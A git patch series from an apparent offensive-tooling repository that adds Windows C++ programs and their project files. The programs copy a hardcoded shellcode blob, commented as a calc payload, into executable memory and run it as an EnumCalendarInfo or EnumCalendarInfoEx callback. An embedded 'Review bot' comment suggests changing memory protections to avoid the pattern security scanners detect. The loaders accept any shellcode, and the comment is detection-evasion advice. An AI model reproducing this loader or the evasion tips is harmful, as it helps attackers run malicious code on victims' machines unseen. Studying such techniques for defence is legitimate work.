+ Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumThreadWindows/EnumThreadWindows.vcxproj.filters b/EnumThreadWindows/EnumThreadWindows.vcxproj.filters new file mode 100644 index 0000000..69e14d2 --- /dev/null +++ b/EnumThreadWindows/EnumThreadWindows.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 84424c6abd394abd4aae434f709301c5130cce78 Mon Sep 17 00:00:00 2001 From: S4R1N <37748671+S4R1N@users.noreply.github.com> Date: Thu, 9 Dec 2021 13:02:39 -0500 Subject: [PATCH 27/28] Create LICENSE --- LICENSE | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..cbd8faa --- /dev/null +++ b/LICENSE 
@@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2021 S4R1N + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. From fa503fd97646291c899d05863b7806970b9e01b6 Mon Sep 17 00:00:00 2001 From: Dani Kamanovsky Date: Sun, 16 Oct 2022 00:01:41 +0300 Subject: [PATCH 28/28] Adding EnumCalendarInfo & EnumCalendarInfoEx functions --- AlternativeShellcodeExec.sln | 20 +++ EnumCalendarInfo/EnumCalendarInfo.cpp | 30 ++++ EnumCalendarInfo/EnumCalendarInfo.vcxproj | 147 ++++++++++++++++++ EnumCalendarInfoEx/EnumCalendarInfoEx.cpp | 30 ++++ EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj | 147 ++++++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 EnumCalendarInfo/EnumCalendarInfo.cpp create mode 100644 EnumCalendarInfo/EnumCalendarInfo.vcxproj create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.cpp create mode 100644 EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 84b41c7..0cb9be6 100644 
--- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -89,6 +89,10 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMP EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumThreadWindows", "EnumThreadWindows\EnumThreadWindows.vcxproj", "{4DC52185-7351-4EFA-A364-65945302F470}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfo", "EnumCalendarInfo\EnumCalendarInfo.vcxproj", "{5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumCalendarInfoEx", "EnumCalendarInfoEx\EnumCalendarInfoEx.vcxproj", "{DE7B0D0A-371D-4401-B2A2-A83E891AB90A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -441,6 +445,22 @@ Global {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.Build.0 = Release|x64 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.ActiveCfg = Release|Win32 {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.Build.0 = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.ActiveCfg = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x64.Build.0 = Debug|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.ActiveCfg = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Debug|x86.Build.0 = Debug|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.ActiveCfg = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x64.Build.0 = Release|x64 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.ActiveCfg = Release|Win32 + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F}.Release|x86.Build.0 = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.ActiveCfg = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x64.Build.0 = Debug|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.ActiveCfg = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Debug|x86.Build.0 = Debug|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.ActiveCfg = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x64.Build.0 = Release|x64 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.ActiveCfg = Release|Win32 + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumCalendarInfo/EnumCalendarInfo.cpp b/EnumCalendarInfo/EnumCalendarInfo.cpp new file mode 100644 index 0000000..42b1942 --- /dev/null +++ b/EnumCalendarInfo/EnumCalendarInfo.cpp 
@@ -0,0 +1,30 @@
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+int main() {
+ LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ ::RtlMoveMemory(addr, op, sizeof(op));
+ ::EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
+}
\ No newline at end of file
diff --git a/EnumCalendarInfo/EnumCalendarInfo.vcxproj b/EnumCalendarInfo/EnumCalendarInfo.vcxproj
new file mode 100644
index 0000000..02c3958
--- /dev/null
+++ b/EnumCalendarInfo/EnumCalendarInfo.vcxproj
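Review bot: `::VirtualAlloc` is unchecked, so a failed allocation makes `::RtlMoveMemory` write to address 0 before `EnumCalendarInfo` is reached; add `if (!addr) return 1;` between the two calls. Whether the payload runs at all depends on `LOCALE_USER_DEFAULT` yielding at least one calendar with a `CAL_SMONTHNAME1` entry — true for standard locales, but a silent `FALSE` from `EnumCalendarInfo` would otherwise look identical to a working build, so a comment such as `// callback fires once per month name of each calendar in the user locale; FALSE here means the payload was never called` is worth adding. The memory is also left `PAGE_EXECUTE_READWRITE` for the whole lifetime; copying under `PAGE_READWRITE` and flipping to `PAGE_EXECUTE_READ` with `VirtualProtect` before the enumeration removes the W+X region that scanners key on.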
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5BDC9F31-D3D7-4CCF-A06E-4C1D59D3AE0F} + EnumCalendarInfo + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp new file mode 100644 index 0000000..a004353 --- /dev/null +++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp 
@@ -0,0 +1,30 @@
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+int main() {
+ LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ ::RtlMoveMemory(addr, op, sizeof(op));
+ ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
+}
\ No newline at end of file
diff --git a/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj
new file mode 100644
index 0000000..a67cfdf
--- /dev/null
+++ b/EnumCalendarInfoEx/EnumCalendarInfoEx.vcxproj
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {DE7B0D0A-371D-4401-B2A2-A83E891AB90A} + EnumCalendarInfoEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file
